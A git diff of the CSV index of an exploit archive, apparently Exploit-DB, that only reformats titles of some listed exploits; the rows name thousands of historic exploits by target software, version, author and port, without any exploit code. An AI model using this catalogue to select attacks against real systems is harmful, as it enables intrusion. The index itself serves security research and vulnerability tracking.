diff --git a/files.csv b/files.csv index 853f74860..ab02b7b3d 100755 --- a/files.csv +++ b/files.csv @@ -389,7 +389,7 @@ id,file,description,date,author,platform,type,port 420,platforms/win32/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win32,dos,0 421,platforms/windows/remote/421.c,"Gaucho 1.4 Mail Client Buffer Overflow Vulnerability",2004-08-27,"Tan Chew Keong",windows,remote,0 422,platforms/windows/dos/422.c,"Painkiller <= 1.3.1 - Denial of Service Exploit",2004-08-27,"Luigi Auriemma",windows,dos,0 -423,platforms/windows/dos/423.pl,"Easy File Sharing Webserver 1.25 Denial of Service Exploit",2004-08-27,"GulfTech Security",windows,dos,0 +423,platforms/windows/dos/423.pl,"Easy File Sharing Webserver 1.25 - Denial of Service Exploit",2004-08-27,"GulfTech Security",windows,dos,0 424,platforms/linux/remote/424.c,"Citadel/UX Remote Buffer Overflow Exploit",2004-08-30,Nebunu,linux,remote,504 425,platforms/hardware/remote/425.c,"D-Link DCS-900 Camera Remote IP Address Changer Exploit",2004-08-31,N/A,hardware,remote,0 426,platforms/windows/remote/426.c,"TiTan FTP Server Long Command Heap Overflow PoC Exploit",2004-08-31,lion,windows,remote,21 @@ -410,7 +410,7 @@ id,file,description,date,author,platform,type,port 464,platforms/cgi/webapps/464.txt,"Turbo Seek Null Byte Error Discloses Files to Remote Users",2004-09-13,durito,cgi,webapps,0 465,platforms/php/webapps/465.pl,"PHP-Nuke SQL Injection Edit/Save Message(s) Bug",2004-09-16,iko94,php,webapps,0 466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0 -468,platforms/windows/dos/468.c,"Pigeon Server <= 3.02.0143 Denial of Service Exploit",2004-09-19,"Luigi Auriemma",windows,dos,0 +468,platforms/windows/dos/468.c,"Pigeon Server <= 3.02.0143 - Denial of Service Exploit",2004-09-19,"Luigi Auriemma",windows,dos,0 469,platforms/linux/local/469.c,"CDRecord's ReadCD Local Root Privileges",2004-09-19,"Max Vozeler",linux,local,0 470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission Exploit",2004-09-21,"Angelo Rosiello",linux,local,0 471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service Exploit",2004-09-21,"GulfTech Security",windows,dos,66 @@ -455,7 +455,7 @@ id,file,description,date,author,platform,type,port 590,platforms/windows/remote/590.c,"ShixxNote 6.net Remote Buffer Overflow Exploit",2004-10-22,class101,windows,remote,2000 591,platforms/linux/local/591.c,"socat <= 1.4.0.2 - Local Format String Exploit (not setuid)",2004-10-23,CoKi,linux,local,0 592,platforms/windows/remote/592.py,"Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit",2004-10-23,KaGra,windows,remote,21 -593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 - Ftp Server remote DoS",2004-10-24,KaGra,windows,dos,0 +593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 - Ftp Server Remote DoS",2004-10-24,KaGra,windows,dos,0 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0 598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25 599,platforms/windows/dos/599.py,"BaSoMail Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0 @@ -566,7 +566,7 @@ id,file,description,date,author,platform,type,port 730,platforms/windows/remote/730.html,"Microsoft Internet Explorer Remote Code Execution with Parameters - PoC",2004-12-28,ShredderSub7,windows,remote,0 733,platforms/windows/remote/733.c,"Microsoft Windows 2000 - WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42 734,platforms/windows/remote/734.c,"Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 -736,platforms/windows/dos/736.c,"SOLDNER Secret Wars <= 30830 Denial of Service Exploit",2005-01-04,"Luigi Auriemma",windows,dos,20000 +736,platforms/windows/dos/736.c,"SOLDNER Secret Wars <= 30830 - Denial of Service Exploit",2005-01-04,"Luigi Auriemma",windows,dos,20000 737,platforms/php/webapps/737.txt,"QWikiwiki Directory Traversal Vulnerability",2005-01-04,Madelman,php,webapps,0 738,platforms/php/webapps/738.c,"iWebNegar Configuration Nullification Denial of Service Exploit",2005-01-04,c0d3r,php,webapps,0 739,platforms/bsd/local/739.c,"FreeBSD TOP Format String Vulnerability",2001-07-23,truefinder,bsd,local,0 @@ -586,7 +586,7 @@ id,file,description,date,author,platform,type,port 758,platforms/osx/remote/758.c,"Apple iTunes Playlist Local Parsing Buffer Overflow Exploit",2005-01-16,nemo,osx,remote,0 759,platforms/windows/remote/759.cpp,"Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit",2005-01-16,ATmaCA,windows,remote,0 760,platforms/windows/local/760.cpp,"Peer2Mail <= 1.4 Encrypted Password Dumper Exploit",2005-01-16,ATmaCA,windows,local,0 -761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 Buffer Overflow Vulnerability",2005-01-18,"Tan Chew Keong",windows,remote,162 +761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow Vulnerability",2005-01-18,"Tan Chew Keong",windows,remote,162 762,platforms/osx/dos/762.c,"Mac OS X <= 10.3.7 Input Validation Flaw parse_machfile() DoS",2005-01-20,nemo,osx,dos,0 763,platforms/linux/local/763.c,"fkey <= 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 764,platforms/linux/remote/764.c,"Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)",2003-04-04,spabam,linux,remote,80 @@ -700,7 +700,7 @@ id,file,description,date,author,platform,type,port 877,platforms/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow Exploit",2005-03-14,"Kevin Finisterre",linux,local,0 878,platforms/linux/remote/878.c,"Ethereal <= 0.10.9 - ""3G-A11"" Remote Buffer Overflow Exploit",2005-03-14,"Diego Giagio",linux,remote,0 879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 - 4.5.6 Inappropriate Get Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 -880,platforms/multiple/dos/880.pl,"Freeciv Server <= 2.0.0beta8 Denial of Service Exploit",2005-03-14,"Nico Spicher",multiple,dos,0 +880,platforms/multiple/dos/880.pl,"Freeciv Server <= 2.0.0beta8 - Denial of Service Exploit",2005-03-14,"Nico Spicher",multiple,dos,0 881,platforms/php/webapps/881.txt,"ZPanel <= 2.5 - Remote SQL Injection Exploit",2005-03-15,Mikhail,php,webapps,0 882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash Exploit",2005-03-15,Komrade,windows,dos,0 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated)",2005-04-24,cybertronic,windows,remote,2380 @@ -711,9 +711,9 @@ id,file,description,date,author,platform,type,port 888,platforms/windows/dos/888.txt,"phpDEV5 - System-Call Local Denial of Service Exploit",2005-03-17,Ali7,windows,dos,0 889,platforms/php/webapps/889.pl,"phpBB <= 2.0.12 Change User Rights Authentication Bypass",2005-03-21,Kutas,php,webapps,0 890,platforms/linux/local/890.pl,"PostScript Utilities - psnup Argument Buffer Overflow",2005-03-21,lammat,linux,local,0 -891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0 +891,platforms/windows/dos/891.pl,"MCPWS Personal WebServer <= 1.3.21 - Denial of Service Exploit",2005-03-21,"Nico Spicher",windows,dos,0 892,platforms/php/webapps/892.txt,"phpMyFamily <= 1.4.0 Admin Bypass SQL Injection",2005-03-21,kre0n,php,webapps,0 -893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0 +893,platforms/windows/dos/893.pl,"Ocean FTP Server 1.00 - Denial of Service Exploit",2005-03-21,"GSS IT",windows,dos,0 895,platforms/linux/local/895.c,"Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit",2005-03-22,sd,linux,local,0 896,platforms/osx/local/896.c,"Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local Root Buffer Overflow",2005-03-22,vade79,osx,local,0 897,platforms/php/webapps/897.cpp,"phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code)",2005-03-24,str0ke,php,webapps,0 @@ -901,7 +901,7 @@ id,file,description,date,author,platform,type,port 1091,platforms/windows/local/1091.c,"Internet Download Manager <= 4.05 Input URL Stack Overflow Exploit",2005-07-06,c0d3r,windows,local,0 1092,platforms/solaris/local/1092.c,"Solaris SPARC / x86 - Local Socket Hijack Exploit",2005-07-06,c0ntex,solaris,local,0 1093,platforms/windows/dos/1093.c,"PrivaShare <= 1.3 - Denial of Service Exploit",2005-07-07,basher13,windows,dos,0 -1094,platforms/windows/dos/1094.pl,"AnalogX SimpleServer:WWW <= 1.05 Denial of Service Exploit",2005-07-07,Qnix,windows,dos,0 +1094,platforms/windows/dos/1094.pl,"AnalogX SimpleServer:WWW <= 1.05 - Denial of Service Exploit",2005-07-07,Qnix,windows,dos,0 1095,platforms/php/webapps/1095.txt,"phpBB <= 2.0.16 - XSS Remote Cookie Disclosure Exploit",2005-07-08,D|ablo,php,webapps,0 1096,platforms/windows/remote/1096.txt,"Hosting Controller <= 0.6.1 HotFix 2.1 Change Credit Limit Exploit",2005-07-10,"Soroush Dalili",windows,remote,0 1097,platforms/php/webapps/1097.txt,"BlogTorrent <= 0.92 - Remote Password Disclosure Exploit",2005-07-11,LazyCrs,php,webapps,0 @@ -961,7 +961,7 @@ id,file,description,date,author,platform,type,port 1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0 1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation Exploit",2005-04-27,"Reed Arvin",windows,local,0 -1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server <= 5.14 Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0 +1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server <= 5.14 - Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0 1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition <= 5.2.2 - DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0 1164,platforms/windows/dos/1164.pl,"BusinessMail <= 4.60.00 - Remote Buffer Overflow Exploit",2005-07-30,"Reed Arvin",windows,dos,0 1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) BoF Exploit",2005-06-27,"Reed Arvin",windows,dos,0 @@ -995,7 +995,7 @@ id,file,description,date,author,platform,type,port 1196,platforms/linux/dos/1196.c,"CUPS Server <= 1.1 (Get Request) Denial of Service Exploit",2005-09-05,tracewar,linux,dos,0 1197,platforms/windows/local/1197.c,"Microsoft Windows - (keybd_event) Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Local Privilege Escalation Exploit (MS05-018)",2005-09-06,eyas,windows,local,0 -1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker <= 7.7r3 Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0 +1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker <= 7.7r3 - Denial of Service Exploit",2005-09-06,Sowhat,windows,dos,0 1200,platforms/php/webapps/1200.php,"PBLang <= 4.65 - Remote Command Execution Exploit",2005-09-07,rgod,php,webapps,0 1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager <= 1.2 Command Execution Exploit",2005-09-07,basher13,windows,remote,0 1202,platforms/php/webapps/1202.php,"PBLang <= 4.65 - Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0 @@ -1030,7 +1030,7 @@ id,file,description,date,author,platform,type,port 1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 Command Execution Exploit (meta)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 (msg_send) SQL Injection Exploit",2005-09-28,rgod,php,webapps,0 1238,platforms/linux/remote/1238.c,"Prozilla <= 1.3.7.4 (ftpsearch) Results Handling Buffer Overflow Exploit",2005-10-02,taviso,linux,remote,8080 -1239,platforms/windows/dos/1239.c,"Virtools Web Player <= 3.0.0.100 Buffer Overflow DoS Exploit",2005-10-02,"Luigi Auriemma",windows,dos,0 +1239,platforms/windows/dos/1239.c,"Virtools Web Player <= 3.0.0.100 - Buffer Overflow DoS Exploit",2005-10-02,"Luigi Auriemma",windows,dos,0 1240,platforms/php/webapps/1240.php,"Utopia News Pro <= 1.1.3 (news.php) SQL Injection Exploit",2005-10-06,rgod,php,webapps,0 1241,platforms/php/webapps/1241.php,"Cyphor <= 0.19 (board takeover) SQL Injection Exploit",2005-10-08,rgod,php,webapps,0 1242,platforms/linux/remote/1242.pl,"xine-lib <= 1.1 (media player library) Remote Format String Exploit",2005-10-10,"Ulf Harnhammar",linux,remote,0 @@ -1054,7 +1054,7 @@ id,file,description,date,author,platform,type,port 1261,platforms/hp-ux/remote/1261.pm,"HP-UX <= 11.11 lpd Remote Command Execution Exploit (meta)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 CAM log_security() Stack Overflow Exploit (meta)",2005-10-19,"H D Moore",windows,remote,4105 1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (linux)",2005-10-20,"Kevin Finisterre",multiple,remote,13722 -1264,platforms/windows/remote/1264.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (win32)",2005-10-20,"Kevin Finisterre",windows,remote,13722 +1264,platforms/windows/remote/1264.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (Win32)",2005-10-20,"Kevin Finisterre",windows,remote,13722 1265,platforms/osx/remote/1265.pl,"Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (OS X)",2005-10-20,"Kevin Finisterre",osx,remote,13722 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 - 0.10.12 SLIMP3 - Remote Buffer Overflow PoC",2005-10-20,Sowhat,windows,dos,0 1267,platforms/linux/local/1267.c,"XMail 1.21 (-t Command Line Option) Local Root Buffer Overflow Exploit",2005-10-20,qaaz,linux,local,0 @@ -1075,8 +1075,8 @@ id,file,description,date,author,platform,type,port 1283,platforms/windows/dos/1283.c,"FlatFrag <= 0.3 - Buffer Overflow / Denial of Service Exploit",2005-11-02,"Luigi Auriemma",windows,dos,0 1284,platforms/windows/dos/1284.c,"Glider collectn kill <= 1.0.0.0 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1285,platforms/windows/dos/1285.c,"Scorched 3D <= 39.1 - Multiple Vulnerabilities (All-in-One) (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 -1286,platforms/windows/dos/1286.c,"GO-Global Windows Clients <= 3.1.0.3270 Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 -1287,platforms/windows/dos/1287.c,"GO-Global Windows Server <= 3.1.0.3270 Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 +1286,platforms/windows/dos/1286.c,"GO-Global Windows Clients <= 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 +1287,platforms/windows/dos/1287.c,"GO-Global Windows Server <= 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1288,platforms/linux/remote/1288.pl,"Lynx <= 2.8.6dev.13 - Remote Buffer Overflow Exploit (port bind)",2005-11-02,xwings,linux,remote,0 1289,platforms/php/webapps/1289.php,"CuteNews <= 1.4.1 (shell inject) Remote Command Execution Exploit",2005-11-03,rgod,php,webapps,0 1290,platforms/linux/remote/1290.pl,"gpsdrive <= 2.09 (friendsd2) Remote Format String Exploit (ppc)",2005-11-04,"Kevin Finisterre",linux,remote,0 @@ -1187,7 +1187,7 @@ id,file,description,date,author,platform,type,port 1419,platforms/asp/webapps/1419.pl,"MiniNuke <= 1.8.2 (news.asp hid) SQL Injection Exploit",2006-01-14,DetMyl,asp,webapps,0 1420,platforms/windows/remote/1420.c,"Microsoft Windows Metafile (WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701 -1422,platforms/windows/dos/1422.c,"Cerberus FTP Server <= 2.32 Denial of Service Exploit",2006-01-16,pi3ch,windows,dos,0 +1422,platforms/windows/dos/1422.c,"Cerberus FTP Server <= 2.32 - Denial of Service Exploit",2006-01-16,pi3ch,windows,dos,0 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer <= 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 1424,platforms/windows/dos/1424.pl,"Tftpd32 2.81 - (GET Request) Format String Denial of Service PoC",2006-01-19,"Critical Security",windows,dos,0 1425,platforms/linux/local/1425.c,"Xmame <= 0.102 (-pb/-lang/-rec) Local Buffer Overflow Exploit",2006-01-21,sj,linux,local,0 @@ -1364,7 +1364,7 @@ id,file,description,date,author,platform,type,port 1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 1624,platforms/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 -1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144 +1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (Win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144 1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 @@ -2369,7 +2369,7 @@ id,file,description,date,author,platform,type,port 2677,platforms/php/webapps/2677.asp,"Netref 4 (cat_for_aff.php) Source Code Disclosure Exploit",2006-10-29,ajann,php,webapps,0 2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 (faq_reply.php) Remote File Include Vulnerability",2006-10-29,v1per-haCker,php,webapps,0 2679,platforms/php/webapps/2679.txt,"PHPMyRing <= 4.2.1 (cherche.php) Remote SQL Injection Vulnerability",2006-10-29,ajann,php,webapps,0 -2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (win32)",2006-10-29,"Michael Thumann",windows,remote,80 +2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32)",2006-10-29,"Michael Thumann",windows,remote,80 2681,platforms/php/webapps/2681.txt,"QnECMS <= 2.5.6 (adminfolderpath) Remote File Inclusion Exploit",2006-10-30,K-159,php,webapps,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows NAT Helper Components Remote DoS Exploit (perl)",2006-10-30,x82,windows,dos,0 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement (key) Remote SQL Injection Vulnerability",2006-10-30,ajann,asp,webapps,0 @@ -2710,7 +2710,7 @@ id,file,description,date,author,platform,type,port 3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 (admin.asp) Login ByPass SQL Injection Vulnerability",2006-12-28,ajann,asp,webapps,0 3036,platforms/php/webapps/3036.php,"WebText <= 0.4.5.2 - Remote Code Execution Exploit",2006-12-28,Kacper,php,webapps,0 3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow Exploit",2006-12-29,rgod,windows,remote,4002 -3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 Denial of Service Exploit",2006-12-29,rgod,windows,dos,0 +3038,platforms/windows/dos/3038.php,"Durian Web Application Server 3.02 - Denial of Service Exploit",2006-12-29,rgod,windows,dos,0 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 Password Disclosure Vulnerability",2006-12-29,bd0rk,php,webapps,0 3041,platforms/windows/dos/3041.html,"Macromedia Flash 8 (Flash8b.ocx) Internet Explorer Denial of Service",2006-12-29,shinnai,windows,dos,0 3042,platforms/windows/dos/3042.html,"Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service",2006-12-29,shinnai,windows,dos,0 @@ -2871,7 +2871,7 @@ id,file,description,date,author,platform,type,port 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 (package.php) Remote File Include Vulnerability",2007-01-26,"Cold Zero",php,webapps,0 3202,platforms/php/webapps/3202.txt,"AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability",2007-01-26,"ThE dE@Th",php,webapps,0 3203,platforms/php/webapps/3203.txt,"FdScript <= 1.3.2 (download.php) Remote File Disclosure Vulnerability",2007-01-26,ajann,php,webapps,0 -3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider Buffer Overflow PoC",2007-01-26,"Andres Tarasco",windows,dos,0 +3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow PoC",2007-01-26,"Andres Tarasco",windows,dos,0 3205,platforms/php/webapps/3205.txt,"nsGalPHP (includes/config.inc.php racineTBS) Remote Inclusion Vuln",2007-01-27,S.W.A.T.,php,webapps,0 3206,platforms/php/webapps/3206.txt,"ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability",2007-01-27,ajann,php,webapps,0 3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Include Exploit",2007-01-27,MackRulZ,php,webapps,0 @@ -2975,7 +2975,7 @@ id,file,description,date,author,platform,type,port 3305,platforms/php/webapps/3305.txt,"nabopoll 1.2 - Remote Unprotected Admin Section Vulnerability",2007-02-13,sn0oPy,php,webapps,0 3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise <= 2.35 Out of Bounds DoS Exploit",2007-02-14,mu-b,windows,dos,0 3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit PoC",2007-02-14,shinnai,windows,dos,0 -3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise <= 2.37 Denial of Service Exploit",2007-02-14,mu-b,windows,dos,0 +3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise <= 2.37 - Denial of Service Exploit",2007-02-14,mu-b,windows,dos,0 3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 (index.php) Local/Remote File Include Vulnerability",2007-02-14,DarkFig,php,webapps,0 3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 (Client-IP) Remote SQL Injection Exploit",2007-02-14,DarkFig,php,webapps,0 3311,platforms/php/webapps/3311.php,"Jupiter CMS 1.1.5 - Remote File Upload Exploit",2007-02-14,DarkFig,php,webapps,0 @@ -3113,7 +3113,7 @@ id,file,description,date,author,platform,type,port 3448,platforms/php/webapps/3448.txt,"work system e-commerce <= 3.0.5 - Remote File Inclusion Vulnerability",2007-03-10,"Rodrigo Duarte",php,webapps,0 3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability",2007-03-10,WiLdBoY,php,webapps,0 3450,platforms/php/webapps/3450.php,"NukeSentinel <= 2.5.06 - Remote SQL Injection Exploit",2007-03-10,DarkFig,php,webapps,0 -3451,platforms/windows/local/3451.c,"Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)",2007-03-10,"Cesar Cerrudo",windows,local,0 +3451,platforms/windows/local/3451.c,"Oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (Win32)",2007-03-10,"Cesar Cerrudo",windows,local,0 3452,platforms/multiple/remote/3452.php,"PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0 3453,platforms/windows/dos/3453.py,"Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption",2007-03-10,h07,windows,dos,0 3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 (phgdir) Remote File Include Exploit",2007-03-11,bd0rk,php,webapps,0 @@ -3137,7 +3137,7 @@ id,file,description,date,author,platform,type,port 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 (root_path) Remote File Inclusion Vulnerability",2007-03-13,the_day,php,webapps,0 3473,platforms/php/webapps/3473.txt,"WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability",2007-03-13,the_day,php,webapps,0 3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4)",2007-03-14,"Winny Thomas",windows,remote,21 -3476,platforms/php/webapps/3476.pl,"Zomplog <= 3.7.6 - Local File Inclusion Vulnerabilty (win32)",2007-03-14,Bl0od3r,php,webapps,0 +3476,platforms/php/webapps/3476.pl,"Zomplog <= 3.7.6 - Local File Inclusion Vulnerabilty (Win32)",2007-03-14,Bl0od3r,php,webapps,0 3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 (comments.php id) Remote SQL Injection Exploit",2007-03-14,WiLdBoY,php,webapps,0 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability",2007-03-14,Dj7xpl,php,webapps,0 3479,platforms/linux/local/3479.php,"PHP <= 5.2.1 session_regenerate_id() Double Free Exploit",2007-03-14,"Stefan Esser",linux,local,0 @@ -3187,7 +3187,7 @@ id,file,description,date,author,platform,type,port 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln",2007-03-20,"Cold Zero",php,webapps,0 3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0 -3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (win32)",2007-03-20,mu-b,windows,dos,0 +3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (Win32)",2007-03-20,mu-b,windows,dos,0 3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0 3529,platforms/linux/local/3529.php,"PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3530,platforms/php/webapps/3530.pl,"Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit",2007-03-20,fluffy_bunny,php,webapps,0 @@ -3335,7 +3335,7 @@ id,file,description,date,author,platform,type,port 3677,platforms/php/webapps/3677.txt,"cattaDoc 2.21 (download2.php fn1) Remote File Disclosure Vulnerability",2007-04-06,GoLd_M,php,webapps,0 3678,platforms/php/webapps/3678.php,"SmodBIP <= 1.06 (aktualnosci zoom) Remote SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 3679,platforms/php/webapps/3679.php,"SmodCMS <= 2.10 (Slownik ssid) Remote SQL Injection Exploit",2007-04-06,Kacper,php,webapps,0 -3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)",2007-04-07,axis,windows,remote,80 +3680,platforms/windows/remote/3680.sh,"Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (Win32)",2007-04-07,axis,windows,remote,80 3681,platforms/php/webapps/3681.txt,"Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability",2007-04-08,Dj7xpl,php,webapps,0 3683,platforms/php/webapps/3683.pl,"PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit",2007-04-08,bd0rk,php,webapps,0 3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Exploit",2007-04-08,Marsu,windows,dos,0 @@ -3475,7 +3475,7 @@ id,file,description,date,author,platform,type,port 3819,platforms/windows/dos/3819.py,"RealPlayer 10 - (.ra) Remote Denial of Service Exploit",2007-04-30,n00b,windows,dos,0 3820,platforms/php/webapps/3820.php,"psipuss 1.0 (editusers.php) Remote Change Admin 